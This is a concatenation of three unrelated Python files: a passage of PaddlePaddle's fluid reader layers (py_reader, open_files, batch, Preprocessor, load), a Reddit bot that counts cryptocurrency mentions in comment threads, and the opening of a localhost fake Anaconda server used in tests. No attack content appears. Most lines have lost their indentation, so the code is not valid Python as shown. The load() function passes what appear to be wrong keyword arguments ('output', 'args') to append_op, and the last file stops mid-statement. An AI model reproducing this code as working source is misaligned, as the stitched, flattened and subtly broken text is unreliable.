    C++ side, the data from the generator is read automatically. Unlike
:code:`DataFeeder.feed()`, the data reading process and
:code:`Executor::Run()` process can run in parallel using
:code:`py_reader`. The :code:`start()` method of the Reader should be
called when each pass begins, while the :code:`reset()` method should be
called when the pass ends and :code:`fluid.core.EOFException` raises.
Note that :code:`Program.clone()` method cannot clone :code:`py_reader`.
Args:
capacity(int): The buffer capacity maintained by :code:`py_reader`.
shapes(list|tuple): List of tuples which declaring data shapes.
dtypes(list|tuple): List of strs which declaring data type.
lod_levels(list|tuple): List of ints which declaring data lod_level.
        name(basestring): The name prefix of the Python queue and the Reader. If
            None, a unique name will be generated automatically.
use_double_buffer(bool): Whether use double buffer or not.
Returns:
Variable: A Reader from which we can get feeding data.
Examples:
1. The basic usage of :code:`py_reader` is as follows:
>>> import paddle.v2
>>> import paddle.fluid as fluid
>>> import paddle.dataset.mnist as mnist
>>>
>>> reader = fluid.layers.py_reader(capacity=64,
>>> shapes=[(-1,3,224,224), (-1,1)],
>>> dtypes=['float32', 'int64'])
        >>> reader.decorate_paddle_reader(
        >>>     paddle.v2.reader.shuffle(paddle.batch(mnist.train(), 512),
        >>>                              buf_size=8192))
>>>
>>> img, label = fluid.layers.read_file(reader)
>>> loss = network(img, label) # some network definition
>>>
>>> fluid.Executor(fluid.CUDAPlace(0)).run(fluid.default_startup_program())
>>>
>>> exe = fluid.ParallelExecutor(use_cuda=True, loss_name=loss.name)
>>> for epoch_id in range(10):
>>> reader.start()
>>> try:
>>> while True:
>>> exe.run(fetch_list=[loss.name])
>>> except fluid.core.EOFException:
>>> reader.reset()
2. When training and testing are both performed, two different
:code:`py_reader` should be created with different names, e.g.:
>>> import paddle.v2
>>> import paddle.fluid as fluid
>>> import paddle.dataset.mnist as mnist
>>>
>>> def network(reader):
>>> img, label = fluid.layers.read_file(reader)
>>> # Here, we omitted the network definition
>>> return loss
>>>
>>> train_reader = fluid.layers.py_reader(capacity=64,
>>> shapes=[(-1,3,224,224), (-1,1)],
>>> dtypes=['float32', 'int64'],
>>> name='train_reader')
        >>> train_reader.decorate_paddle_reader(
        >>>     paddle.v2.reader.shuffle(paddle.batch(mnist.train(), 512),
        >>>                              buf_size=8192))
>>>
>>> test_reader = fluid.layers.py_reader(capacity=32,
>>> shapes=[(-1,3,224,224), (-1,1)],
>>> dtypes=['float32', 'int64'],
>>> name='test_reader')
>>> test_reader.decorate_paddle_reader(paddle.batch(mnist.test(), 512))
>>>
>>> # Create train_main_prog and train_startup_prog
>>> train_main_prog = fluid.Program()
>>> train_startup_prog = fluid.Program()
>>> with fluid.program_guard(train_main_prog, train_startup_prog):
>>> # Use fluid.unique_name.guard() to share parameters with test program
>>> with fluid.unique_name.guard():
>>> train_loss = network(train_reader) # some network definition
>>> adam = fluid.optimizer.Adam(learning_rate=0.01)
        >>>         adam.minimize(train_loss)
>>>
>>> # Create test_main_prog and test_startup_prog
>>> test_main_prog = fluid.Program()
>>> test_startup_prog = fluid.Program()
>>> with fluid.program_guard(test_main_prog, test_startup_prog):
>>> # Use fluid.unique_name.guard() to share parameters with train program
>>> with fluid.unique_name.guard():
>>> test_loss = network(test_reader)
>>>
>>> fluid.Executor(fluid.CUDAPlace(0)).run(train_startup_prog)
>>> fluid.Executor(fluid.CUDAPlace(0)).run(test_startup_prog)
>>>
>>> train_exe = fluid.ParallelExecutor(use_cuda=True,
>>> loss_name=train_loss.name, main_program=train_main_prog)
>>> test_exe = fluid.ParallelExecutor(use_cuda=True,
>>> loss_name=test_loss.name, main_program=test_main_prog)
>>> for epoch_id in range(10):
>>> train_reader.start()
>>> try:
>>> while True:
>>> train_exe.run(fetch_list=[train_loss.name])
>>> except fluid.core.EOFException:
>>> train_reader.reset()
>>>
>>> test_reader.start()
>>> try:
>>> while True:
>>> test_exe.run(fetch_list=[test_loss.name])
>>> except fluid.core.EOFException:
>>> test_reader.reset()
"""
dtypes = [convert_np_dtype_to_dtype_(dt) for dt in dtypes]
shape_concat = []
ranks = []
for shape in shapes:
shape_concat.extend(shape)
ranks.append(len(shape))
if lod_levels is None:
lod_levels = [0] * len(shapes)
if name is None:
queue_name = unique_name('lod_tensor_blocking_queue')
reader_name = unique_name('create_py_reader')
double_buffer_name = unique_name('double_buffer')
else:
queue_name = "_".join([name, "queue"])
reader_name = "_".join([name, "reader"])
double_buffer_name = "_".join([name, "double_buffer"])
var = global_scope().var(queue_name)
feed_queue = core.init_lod_tensor_blocking_queue(var, capacity, shapes)
startup_blk = default_startup_program().current_block()
startup_var = startup_blk.create_var(name=reader_name)
startup_blk.append_op(
type='create_py_reader',
inputs={'blocking_queue': [queue_name]},
outputs={'Out': [startup_var]},
attrs={
'shape_concat': shape_concat,
'lod_levels': lod_levels,
'ranks': ranks
})
startup_var.desc.set_dtypes(dtypes)
startup_var.persistable = True
main_prog_var = _copy_reader_var_(default_main_program().current_block(),
startup_var)
reader = monkey_patch_reader_methods(main_prog_var)
if use_double_buffer:
double_buffer_reader = double_buffer(reader, name=double_buffer_name)
# we return a double buffer reader. However, the reset method comes from
# py_reader.
double_buffer_reader.reset = reader.reset
reader = double_buffer_reader
# monkey patch py_reader special methods
reader.queue = feed_queue
current_reset_method = reader.reset
reader.thread = None
reader.tensor_provider = None
reader.exited = False
def start_provide_thread(func):
def __provider_thread__():
for tensors in func():
array = core.LoDTensorArray()
for item in tensors:
if not isinstance(item, core.LoDTensor):
tmp = core.LoDTensor()
tmp.set(item, core.CPUPlace())
item = tmp
array.append(item)
if reader.exited:
break
feed_queue.push(array)
if reader.exited:
break
feed_queue.close()
reader.thread = threading.Thread(target=__provider_thread__)
reader.thread.daemon = True
reader.thread.start()
def __set_tensor_provider__(func):
reader.tensor_provider = func
def __set_paddle_reader__(paddle_reader):
with program_guard(Program(), Program()):
feed_list = []
counter = 0
for dtype, shape, lod_level in zip(dtypes, shapes, lod_levels):
name = str(counter)
feed_list.append(
data(
name=name,
dtype=dtype,
shape=shape,
lod_level=lod_level))
counter += 1
feeder = DataFeeder(feed_list=feed_list, place=core.CPUPlace())
paddle_reader = feeder.decorate_reader(
paddle_reader, multi_devices=False)
def __tensor_provider__():
for slots in paddle_reader():
yield [slots[str(idx)] for idx in xrange(counter)]
__set_tensor_provider__(__tensor_provider__)
def __reset__():
current_reset_method()
if reader.thread is not None and reader.tensor_provider is not None:
reader.exited = True
reader.thread.join()
reader.exited = False
def __start__():
start_provide_thread(reader.tensor_provider)
reader.reset = __reset__
reader.decorate_tensor_provider = __set_tensor_provider__
reader.decorate_paddle_reader = __set_paddle_reader__
reader.start = __start__
return reader
def open_files(filenames,
shapes,
lod_levels,
dtypes,
thread_num=None,
buffer_size=None,
pass_num=1,
is_test=None):
"""
Open files
This layer takes a list of files to read from and returns a Reader Variable.
Via the Reader Variable, we can get data from given files. All files must
    have name suffixes to indicate their formats, e.g., '*.recordio'.
Args:
filenames(list): The list of file names.
shapes(list): List of tuples which declaring data shapes.
lod_levels(list): List of ints which declaring data lod_level.
dtypes(list): List of strs which declaring data type.
        thread_num(int|None): The number of threads used to read files.
            Default: min(len(filenames), cpu_count).
        buffer_size(int|None): The buffer size of the reader. Default: 3 * thread_num.
        pass_num(int): Number of passes to run.
        is_test(bool|None): Whether `open_files` is used for testing. If it is
            used for testing, the order of the generated data is the same as the
            file order. Otherwise, the order of data is not guaranteed to be the
            same between epochs. [Default: False].
Returns:
Variable: A Reader Variable via which we can get file data.
Examples:
.. code-block:: python
reader = fluid.layers.io.open_files(filenames=['./data1.recordio',
'./data2.recordio'],
                                                    shapes=[(3,224,224), (1,)],
lod_levels=[0, 0],
dtypes=['float32', 'int64'])
# Via the reader, we can use 'read_file' layer to get data:
image, label = fluid.layers.io.read_file(reader)
"""
if thread_num is None:
thread_num = min(len(filenames), multiprocessing.cpu_count())
else:
thread_num = int(thread_num)
if buffer_size is None:
buffer_size = 3 * thread_num
else:
buffer_size = int(buffer_size)
if isinstance(filenames, basestring):
filenames = [filenames]
dtypes = [convert_np_dtype_to_dtype_(dt) for dt in dtypes]
shape_concat = []
ranks = []
for shape in shapes:
shape_concat.extend(shape)
ranks.append(len(shape))
multi_file_reader_name = unique_name('multi_file_reader')
startup_blk = default_startup_program().current_block()
startup_reader = startup_blk.create_var(name=multi_file_reader_name)
attrs = {
'shape_concat': shape_concat,
'lod_levels': lod_levels,
'ranks': ranks,
'file_names': filenames,
'thread_num': thread_num,
'buffer_size': buffer_size
}
if is_test is not None:
attrs['is_test'] = is_test
startup_blk.append_op(
type='open_files', outputs={'Out': [startup_reader]}, attrs=attrs)
startup_reader.desc.set_dtypes(dtypes)
startup_reader.persistable = True
main_prog_reader = _copy_reader_var_(default_main_program().current_block(),
startup_reader)
if pass_num > 1:
main_prog_reader = multi_pass(
reader=main_prog_reader, pass_num=pass_num)
return monkey_patch_reader_methods(main_prog_reader)
def __create_shared_decorated_reader__(op_type, reader, attrs):
var_name = unique_name(op_type)
startup_blk = default_startup_program().current_block()
startup_var = startup_blk.create_var(name=var_name)
startop_op = startup_blk.append_op(
type=op_type,
inputs={'UnderlyingReader': reader},
outputs={'Out': [startup_var]},
attrs=attrs)
startup_var.persistable = True
main_prog_block = default_main_program().current_block()
main_prog_var = _copy_reader_var_(main_prog_block, startup_var)
_copy_reader_create_op_(main_prog_block, startop_op)
return monkey_patch_reader_methods(main_prog_var)
def __create_unshared_decorated_reader__(op_type, reader, attrs, name=None):
new_reader_name = name if name is not None else unique_name(op_type)
main_blk = default_main_program().current_block()
new_reader = main_blk.create_var(name=new_reader_name)
main_blk.append_op(
type=op_type,
inputs={'UnderlyingReader': reader},
outputs={'Out': [new_reader]},
attrs=attrs)
return monkey_patch_reader_methods(new_reader)
def shuffle(reader, buffer_size):
"""
Shuffle the reader.
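    A shuffled version of the reader is created by buffering ``buffer_size``
    instances from the underlying reader and yielding them in random order.
    Args:
        reader(Variable): The reader to be decorated with 'shuffling'.
        buffer_size(int): The size of the shuffle buffer.
    Returns:
        Variable: The reader which has been decorated with 'shuffling'.
    Examples:
        .. code-block:: python
            # Illustrative only; `raw_reader` is assumed to come from
            # fluid.layers.io.open_files as in the other examples in this file.
            shuffled_reader = fluid.layers.shuffle(reader=raw_reader,
                                                   buffer_size=1024)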
"""
return __create_unshared_decorated_reader__(
'create_shuffle_reader', reader, {'buffer_size': int(buffer_size)})
def batch(reader, batch_size):
"""
    This layer is a reader decorator. It takes a reader and adds
    'batching' decoration to it. When reading with the resulting
    decorated reader, output data will be automatically organized
    into batches.
Args:
reader(Variable): The reader to be decorated with 'batching'.
batch_size(int): The batch size.
Returns:
Variable: The reader which has been decorated with 'batching'.
Examples:
.. code-block:: python
raw_reader = fluid.layers.io.open_files(filenames=['./data1.recordio',
'./data2.recordio'],
                                                   shapes=[(3,224,224), (1,)],
lod_levels=[0, 0],
dtypes=['float32', 'int64'],
thread_num=2,
buffer_size=2)
batch_reader = fluid.layers.batch(reader=raw_reader, batch_size=5)
# If we read data with the raw_reader:
# data = fluid.layers.read_file(raw_reader)
# We can only get data instance by instance.
#
# However, if we read data with the batch_reader:
# data = fluid.layers.read_file(batch_reader)
# Each 5 adjacent instances will be automatically combined together
# to become a batch. So what we get('data') is a batch data instead
# of an instance.
"""
return __create_unshared_decorated_reader__(
'create_batch_reader', reader, {'batch_size': int(batch_size)})
def double_buffer(reader, place=None, name=None):
"""
Wrap a double buffer reader. The data will copy to target place with a
double buffer queue. If the target place is None, the place that executor
perform on will be used.
Args:
reader(Variable): the reader variable need to be wrapped.
place(Place): the place of target data. Default is the sample place of
executor perform.
name(str): Variable name. None if the user does not care.
Returns:
wrapped reader with double buffer.
Examples:
>>> reader = fluid.layers.open_files(filenames=['somefile'],
>>> shapes=[[-1, 784], [-1, 1]],
>>> dtypes=['float32', 'int64'])
>>> reader = fluid.layers.double_buffer(reader)
>>> img, label = fluid.layers.read_file(reader)
"""
attrs = dict()
if place is not None:
attrs['place'] = str(place).upper()
return __create_unshared_decorated_reader__(
'create_double_buffer_reader', reader, attrs, name=name)
def multi_pass(reader, pass_num):
return __create_shared_decorated_reader__(
'create_multi_pass_reader', reader, {'pass_num': int(pass_num)})
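# Note: ``multi_pass`` registers the decorated reader in both the startup and
# main programs and replays the underlying reader ``pass_num`` times;
# ``open_files`` above calls it automatically when ``pass_num > 1``.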
def read_file(reader):
"""
Execute the given reader and get data via it.
A reader is also a Variable. It can be a raw reader generated by
`fluid.layers.open_files()` or a decorated one generated by
`fluid.layers.double_buffer()` and so on.
Args:
reader(Variable): The reader to execute.
Returns:
Tuple[Variable]: Data read via the given reader.
Examples:
.. code-block:: python
data_file = fluid.layers.open_files(
filenames=['mnist.recordio'],
shapes=[(-1, 748), (-1, 1)],
lod_levels=[0, 0],
dtypes=["float32", "int64"])
data_file = fluid.layers.double_buffer(
fluid.layers.batch(data_file, batch_size=64))
input, label = fluid.layers.read_file(data_file)
"""
helper = LayerHelper('read_file')
out = [
helper.create_tmp_variable(
stop_gradient=True, dtype='float32')
for _ in range(len(reader.desc.shapes()))
]
helper.append_op(
type='read', inputs={'Reader': [reader]}, outputs={'Out': out})
if len(out) == 1:
return out[0]
else:
return out
class Preprocessor(object):
"""
A block for data pre-processing in reader.
Args:
reader (Variable): A reader variable.
name (str, default None): The name of the reader.
Examples:
.. code-block:: python
preprocessor = fluid.layers.io.Preprocessor(reader=reader)
with preprocessor.block():
img, lbl = preprocessor.inputs()
img_out = img / 2
lbl_out = lbl + 1
preprocessor.outputs(img_out, lbl_out)
data_file = fluid.layers.io.double_buffer(preprocessor())
"""
BEFORE_SUB_BLOCK = 0
IN_SUB_BLOCK = 1
AFTER_SUB_BLOCK = 2
def __init__(self, reader, name=None):
self.underlying_reader = reader
new_reader_name = name if name is not None else unique_name(
"create_custom_reader")
self.main_prog = default_main_program()
self.reader = self.main_prog.current_block().create_var(
name=new_reader_name)
self.sub_block = None
self.source_var_names = None
self.sink_var_names = None
self.status = Preprocessor.BEFORE_SUB_BLOCK
def _is_completed(self):
return self.sub_block and self.source_var_names and self.sink_var_names
@contextlib.contextmanager
def block(self):
self.status = Preprocessor.IN_SUB_BLOCK
self.sub_block = self.main_prog.create_block()
yield
self.main_prog.rollback()
self.status = Preprocessor.AFTER_SUB_BLOCK
if not self._is_completed():
raise RuntimeError(
"The definition of preprocessor is incompleted! "
"Please make sure that you have set input and output "
"variables by invoking 'inputs' and 'outputs' in "
"Preprocessor's sub-block.")
def inputs(self):
if self.status != Preprocessor.IN_SUB_BLOCK:
raise RuntimeError(
"Preprocessor.inputs() can only be invoked inside the sub-block."
)
source_shapes = self.underlying_reader.desc.shapes()
source_dtypes = self.underlying_reader.desc.dtypes()
source_lod_levels = self.underlying_reader.desc.lod_levels()
self.source_var_names = [
unique_name("preprocessor_source")
for _ in range(len(source_shapes))
]
source_vars = []
for var_name, shape, dtype, lod_level in zip(
self.source_var_names, source_shapes, source_dtypes,
source_lod_levels):
source_vars.append(self.main_prog.current_block().create_var(
name=var_name, shape=shape, dtype=dtype, lod_level=lod_level))
return source_vars
def outputs(self, *outs):
if self.status != Preprocessor.IN_SUB_BLOCK:
raise RuntimeError(
"Preprocessor.outputs() can only be invoked inside the sub-block."
)
self.sink_var_names = [var.name for var in outs]
def __call__(self, *args, **kwargs):
if self.status != Preprocessor.AFTER_SUB_BLOCK:
raise RuntimeError(
"Preprocessor output can only be retrieved after rnn block.")
self.main_prog.current_block().append_op(
type="create_custom_reader",
inputs={'UnderlyingReader': self.underlying_reader},
outputs={'Out': [self.reader]},
attrs={
"sub_block": self.sub_block,
"source_var_names": self.source_var_names,
"sink_var_names": self.sink_var_names
})
return monkey_patch_reader_methods(self.reader)
@templatedoc()
def load(out, file_path, load_as_fp16=None):
"""
${comment}
>>> import paddle.fluid as fluid
>>> tmp_tensor = fluid.layers.create_tensor(dtype='float32')
>>> fluid.layers.load(tmp_tensor, "./tmp_tensor.bin")
Args:
out(${out_type}): ${out_comment}.
file_path(${file_path_type}): ${file_path_comment}.
load_as_fp16(${load_as_fp16_type}): ${load_as_fp16_comment}.
Returns:
None
"""
helper = LayerHelper("load", **locals())
attrs = {"file_path": file_path}
if load_as_fp16 is not None:
attrs['load_as_fp16'] = load_as_fp16
helper.append_op(type="load", inputs={}, output={"Out": out}, args=attrs)
|
crypto_counter.py
|
import argparse
import logging
import sys
import threading
import time
from datetime import datetime, timedelta
from enum import Enum
from functools import wraps
from queue import Queue
from typing import (Any, Callable, List, Literal, Optional, TypedDict, TypeVar,
                    Union, cast, overload)
import praw
from lib import *
from lib import analyze_comments as analyze_submission_comments
from lib.coingecko import *
from lib.formatting import get_markdown_table
from praw.reddit import Comment, Submission
from tinydb import Query, TinyDB
from tinydb.table import Document
from tinyrecord import transaction
reddit = praw.Reddit("CCC", user_agent="Reddit crypto comments ticker counter by /u/Dan6erbond.")
reddit.validate_on_submit = True
# subreddits = reddit.multireddit("Dan6erbond", "crypto")
subreddits = reddit.subreddit("+".join(["u_CryptoCounterBot", "Solana", "Algorand"]))
db = TinyDB("crypto_counter_bot.json")
logger = logging.getLogger("CryptoCounter")
formatter = logging.Formatter("%(asctime)s - %(name)s - %(levelname)s - %(message)s")
logger.setLevel(logging.DEBUG)
logger.propagate = False
stream_handler = logging.StreamHandler(sys.stdout)
stream_handler.setLevel(logging.WARN)
stream_handler.setFormatter(formatter)
class LevelFilter(logging.Filter):
def __init__(self, level):
self.__level = level
def filter(self, log_record):
return log_record.levelno <= self.__level
logger.addHandler(stream_handler)
log_file_handler = logging.FileHandler("bot.log", "a+", "utf-8")
log_file_handler.setLevel(logging.INFO)
log_file_handler.setFormatter(formatter)
logger.addHandler(log_file_handler)
log_file_handler.addFilter(LevelFilter(logging.INFO))
error_file_handler = logging.FileHandler("bot.error", "a+", "utf-8")
error_file_handler.setLevel(logging.INFO)
error_file_handler.setFormatter(formatter)
logger.addHandler(error_file_handler)
cg_coins_market: List[CoinMarket] = None
cg_coins_market_last_updated: datetime = None
bot_disclaimer = """\n\n
I am a bot built by /u/Dan6erbond.
Results may not be accurate.
Please report any issues on my [GitHub](https://github.com/Dan6erbond/reddit-comments-crypto-counter)."""
lock = threading.Lock()
class CommentTaskAction(str, Enum):
edit = "edit"
reply = "reply"
class CommentTask(TypedDict):
action: CommentTaskAction
edit_comment: Optional[Comment]
reply_to: Optional[Union[Comment, Submission]]
db_submission: Document
text: str
class DocumentType(str, Enum):
submission = "submission"
comment = "comment"
FuncT = TypeVar("FuncT", bound=Callable[..., Any])
# Decorator that logs exceptions and restarts the function
def error_handler(retry: bool = True, timeout: int = 0):
def inner(f: FuncT) -> FuncT:
@wraps(f)
def wrapper(*args: Any, **kwargs: Any) -> Any:
def start(*args: Any, **kwargs: Any) -> Any:
try:
f(*args, **kwargs)
except Exception as e:
logger.exception(e)
finally:
time.sleep(timeout)
if retry:
start(*args, **kwargs)
start(*args, **kwargs)
return cast(FuncT, wrapper)
return inner
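# Usage sketch for the decorator above (illustrative only): wrap a streaming
# worker so uncaught exceptions are logged and the worker restarts after
# ``timeout`` seconds. ``timeout`` must be passed by keyword, since the first
# positional parameter is ``retry``.
#
#     @error_handler(timeout=5 * 60)
#     def my_worker():                  # hypothetical worker
#         for item in some_stream():    # hypothetical stream
#             process(item)             # hypothetical handler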
def initialize_test():
global db, subreddits
db = TinyDB("crypto_counter_bot_test.json")
subreddits = reddit.subreddit("test")
def get_submission(submission_id: str) -> Document:
with lock:
Submission = Query()
res: List[Document] = db.search(
(Submission.type == DocumentType.submission) & (
Submission.id == submission_id))
return res[0] if res else None
@overload
def create_submission(submission_id: str, return_submission: Literal[False]) -> None: ...
@overload
def create_submission(submission_id: str, return_submission: Literal[True]) -> Document: ...
def create_submission(submission_id: str, return_submission: bool = False) -> Union[None, Document]:
with transaction(db) as tr:
tr.insert({
"id": submission_id,
"type": DocumentType.submission,
})
return get_submission(submission_id) if return_submission else None
def analyze_submissions(comments_queue: Queue[CommentTask]):
for submission in subreddits.stream.submissions(skip_existing=True):
submission: Submission
# TODO: Check if submission is applicable for analysis
start_submission_thread(submission, comments_queue)
def analyze_submission(submission: Submission,
comments_queue: Queue[CommentTask],
parent_comment: Comment = None):
global cg_coins_market_last_updated, cg_coins_market
    while True:
        # Default polling interval; refined below based on the submission's age.
        time_interval = 5 * 60
        try:
db_submission = get_submission(submission.id)
if not db_submission:
logger.error(f"Submission {submission.id} not found in database.")
return
if submission.locked:
logger.warning(f"Submission {submission.id} is locked, skipping.")
with transaction(db) as tr:
tr.update({"ignore": True}, doc_ids=[db_submission.doc_id])
return
if submission.subreddit.user_is_banned:
logger.warning(
f"Subreddit {submission.subreddit.display_name} is banned, skipping submission {submission.id}.")
with transaction(db) as tr:
tr.update({"ignore": True}, doc_ids=[db_submission.doc_id])
return
if submission.num_comments < 1:
logger.warning(f"Submission {submission.id} has no comments, skipping.")
return
created = datetime.utcfromtimestamp(submission.created_utc)
age = datetime.utcnow() - created
if age > timedelta(weeks=2):
logger.warning(
f"Submission {submission.id} is too old to handle, skipping.")
with transaction(db) as tr:
tr.update({"ignore": True}, doc_ids=[db_submission.doc_id])
return
if age > timedelta(days=1):
time_interval = 1 * 60 * 60
elif age > timedelta(hours=4):
time_interval = 30 * 60
elif age > timedelta(hours=2):
time_interval = 20 * 60
elif age > timedelta(hours=1):
time_interval = 10 * 60
else:
time_interval = 5 * 60
logger.info(f"Set time interval at {time_interval}.")
if not cg_coins_market_last_updated or datetime.now() - cg_coins_market_last_updated > timedelta(hours=1):
cg_coins_market = get_cg_coins_markets()
cg_coins_market_last_updated = datetime.now()
logger.info("Analyzing submission: " + submission.id)
ranked, _ = analyze_submission_comments(submission, cg_coins_market, [reddit.user.me()])
coin_mentions = sum(count for _, count in ranked)
top = 75 if coin_mentions > 75 else 50 if coin_mentions > 50 else 25 if coin_mentions > 25 else 10 if coin_mentions > 10 else min(
coin_mentions, 10)
comment_text: str
if ranked:
comment_text = f"I've analyzed the submission! These were the top {top} crypto mentions:\n\n" + \
get_markdown_table(ranked, cg_coins_market, top) + \
f"\n\nLast updated: {datetime.now().strftime('%m/%d/%Y, %H:%M:%S')}" + bot_disclaimer
else:
comment_text = "I've analyzed the submission! Unfortunately, at the current time, no results were found." + \
f"\n\nLast updated: {datetime.now().strftime('%m/%d/%Y, %H:%M:%S')}" + bot_disclaimer
if crypto_comments_id := db_submission.get("crypto_comments_id"):
comment = reddit.comment(crypto_comments_id)
comments_queue.put(
CommentTask(
action=CommentTaskAction.edit,
edit_comment=comment,
db_submission=db_submission,
text=comment_text
)
)
else:
comments_queue.put(
CommentTask(
action=CommentTaskAction.reply,
reply_to=parent_comment or submission,
db_submission=db_submission,
text=comment_text
)
)
except Exception as e:
logger.error(str(e))
finally:
time.sleep(time_interval)
def start_submission_thread(submission: Submission,
comments_queue: Queue[CommentTask],
db_submission: Document = None,
parent_comment: Comment = None):
if db_submission or (db_submission := get_submission(submission.id)):
if crypto_comments_id := db_submission.get("crypto_comments_id"):
if parent_comment:
crypto_comment = reddit.comment(crypto_comments_id)
parent_comment.reply(
"I've already analyzed this submission! " +
f"You can see the most updated results [here](https://reddit.com{crypto_comment.permalink}).")
logging.warning(f"Submission {submission.id} has already been analyzed, skipping.")
return
else:
db_submission = create_submission(submission.id, True)
threading.Thread(
target=analyze_submission,
args=(
submission,
comments_queue,
parent_comment)).start()
@error_handler(timeout=5 * 60)
def analyze_comments(comments_queue: Queue[CommentTask]):
for comment in subreddits.stream.comments(skip_existing=True):
if any(mention.lower() in comment.body.lower()
for mention in ["!CryptoMentions", "!CryptoCounter"]):
start_submission_thread(comment.submission, comments_queue, parent_comment=comment)
@error_handler(timeout=5 * 60)
def analyze_mentions(comments_queue: Queue[CommentTask]):
for mention in reddit.inbox.stream(skip_existing=True):
if isinstance(mention, Comment):
mention: Comment
if f"u/{reddit.user.me().name.lower()}" in mention.body.lower():
mention.mark_read()
start_submission_thread(mention.submission, comments_queue, parent_comment=mention)
def analyze_database(comments_queue: Queue[CommentTask]):
Submission = Query()
for doc in db.search((Submission.type == DocumentType.submission) & (
(Submission.ignore == False) | ~(Submission.ignore.exists()))):
start_submission_thread(reddit.submission(doc["id"]), comments_queue, db_submission=doc)
def comment_worker(comment_queue: Queue[CommentTask]):
last_task_done: Optional[datetime] = None
while True:
comment_task = comment_queue.get()
if last_task_done:
time.sleep(max(0, 5 - (datetime.now() - last_task_done).total_seconds()))
if comment_task["action"] == CommentTaskAction.edit:
logger.info(f"Editing comment {comment_task['edit_comment'].id}.")
comment_task["edit_comment"].edit(comment_task["text"])
elif comment_task["action"] == CommentTaskAction.reply:
logger.info(
f"Replying to {'comment' if isinstance(comment_task['reply_to'], Comment) else 'submission'} {comment_task['reply_to'].id}.")
comment: Comment = comment_task["reply_to"].reply(comment_task["text"])
with transaction(db) as tr:
tr.update({"crypto_comments_id": comment.id}, doc_ids=[comment_task["db_submission"].doc_id])
comment_queue.task_done()
last_task_done = datetime.now()
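# The worker above spaces writes at least five seconds apart (presumably to stay
# within Reddit's API limits) and persists the bot's comment id to TinyDB so the
# next analysis pass edits the same comment instead of posting a new one.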
def main():
print("Starting Crypto Counter Bot.")
logger.info("Creating comments task queue.")
    comments_queue: Queue[CommentTask] = Queue()
logger.info("Starting database thread.")
threading.Thread(target=analyze_database, args=(comments_queue, )).start()
logger.info("Starting comments thread.")
threading.Thread(target=analyze_comments, args=(comments_queue, )).start()
logger.info("Starting inbox thread.")
threading.Thread(target=analyze_mentions, args=(comments_queue, )).start()
# threading.Thread(target=analyze_submissions).start()
logger.info("Starting comment worker.")
threading.Thread(target=comment_worker, args=(comments_queue, ), daemon=True).start()
parser = argparse.ArgumentParser(description="Scan Reddit comment trees for crypto coin tickers and names.")
parser.add_argument("--test", "-t", dest="test", action="store_true", help="Run in test mode.")
parser.add_argument(
"--clear-db",
"-cdb",
dest="clear_db",
action="store_true",
help="Clear the database.")
parser.set_defaults(test=False, clear_db=False)
if __name__ == "__main__":
args = parser.parse_args()
if args.test:
print("Running in test mode.")
initialize_test()
if args.clear_db:
print("Clearing DB.")
db.truncate()
main()
|
fake_server.py
|
# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Copyright (c) 2016, Anaconda, Inc. All rights reserved.
#
# Licensed under the terms of the BSD 3-Clause License.
# The full license is in the file LICENSE.txt, distributed with this software.
# -----------------------------------------------------------------------------
from __future__ import absolute_import, print_function
import json
import socket
import sys
import threading
from tornado.ioloop import IOLoop
from tornado.httpserver import HTTPServer
from tornado.netutil import bind_sockets
from tornado.web import Application, RequestHandler
class ProjectViewHandler(RequestHandler):
def __init__(self, application, *args, **kwargs):
# Note: application is stored as self.application
super(ProjectViewHandler, self).__init__(application, *args, **kwargs)
def get(self, *args, **kwargs):
# print("Received GET %r %r" % (args, kwargs), file=sys.stderr)
path = args[0]
if path == 'user':
if 'auth' in self.application.server.fail_these:
self.set_status(401)
else:
if 'missing_login' in self.application.server.fail_these:
self.set_header('Content-Type', 'application/json')
self.write('{}')
else:
self.set_header('Content-Type', 'application/json')
self.write('{"login":"fake_username"}\n')
elif path == 'user/foobar':
self.set_header('Content-Type', 'application/json')
self.write('{"login":"foobar"}\n')
else:
self.set_status(status_code=404)
def post(self, *args, **kwargs):
# print("Received POST %r %r" % (args, kwargs), file=sys.stderr)
path = args[0]
if path == 'apps/fake_username/projects':
if 'create' in self.application.server.fail_these:
self.set_status(501)
else:
self.set_header('Content-Type', 'application/json')
self.write('{}\n')
elif path.startswith('apps/fake_username/projects/'):
path = path[len('apps/fake_username/projects/'):]
[project, operation] = path.split("/", 1)
# print("project=" + project + " operation=" + operation, file=sys.stderr)
if operation == 'stage':
if 'stage' in self.application.server.fail_these:
self.set_status(501)
else:
body = json.loads(self.request.body.decode('utf-8'))
assert 'basename' in body
assert body['basename'] == self.application.server.expected_basename
post_url = self.application.server.url + "fake_s3"
self.set_header('Content-Type', 'application/json')
self.write(('{"post_url":"%s", ' + '"form_data":{"x-should-be-passed-back-to-us":"12345"},' +
'"dist_id":"rev42"}\n') % (post_url))
elif operation == 'commit/rev42':
if 'commit' in self.application.server.fail_these:
self.set_status(501)
else:
self.set_header('Content-Type', 'application/json')
self.write('{"url":"http://example.com/whatevs"}')
else:
self.set_status(status_code=404)
elif path == 'fake_s3':
if 's3' in self.application.server.fail_these:
self.set_status(501)
else:
if self.get_body_argument('x-should-be-passed-back-to-us') != '12345':
print("form_data for s3 wasn't sent", file=sys.stderr)
self.set_status(status_code=500)
else:
assert 'file' in self.request.files
assert len(self.request.files['file']) == 1
fileinfo = self.request.files['file'][0]
assert fileinfo['filename'] == self.application.server.expected_basename
assert len(fileinfo['body']) > 100 # shouldn't be some tiny or empty thing
else:
self.set_status(status_code=404)
class FakeAnacondaApplication(Application):
def __init__(self, server, **kwargs):
self.server = server
patterns = [(r'/(.*)', ProjectViewHandler)]
super(FakeAnacondaApplication, self).__init__(patterns, **kwargs)
class FakeAnacondaServer(object):
def __init__(self, fail_these, expected_basename):
self.fail_these = fail_these
self.expected_basename = expected_basename
self._application = FakeAnacondaApplication(server=self)
self._http = HTTPServer(self._application)
# these would throw OSError on failure
sockets = bind_sockets(port=None, address='127.0.0.1')
self._port = None
for s in sockets:
# we have to find the ipv4 one
if s.family == socket.AF_INET:
self._port = s.getsockname()[1]
assert self._port is not None
self._http.add_sockets(sockets)
self._http.start(1)
@property
def port(self):
return self._port
@property
def url(self):
return "http://localhost:%d/" % self.port
def unlisten(self):
"""Permanently close down the HTTP server, no longer listen on any sockets."""
self._http.close_all_connections()
self._http.stop()
def _monkeypatch_client_config(monkeypatch, url):
def _mock_get_config(user=True, site=True, remote_site=None):
return {'url': url}
# get_config moved into a `config` submodule at some point in anaconda-client
try:
import binstar_client.utils.config # noqa # (unused import)
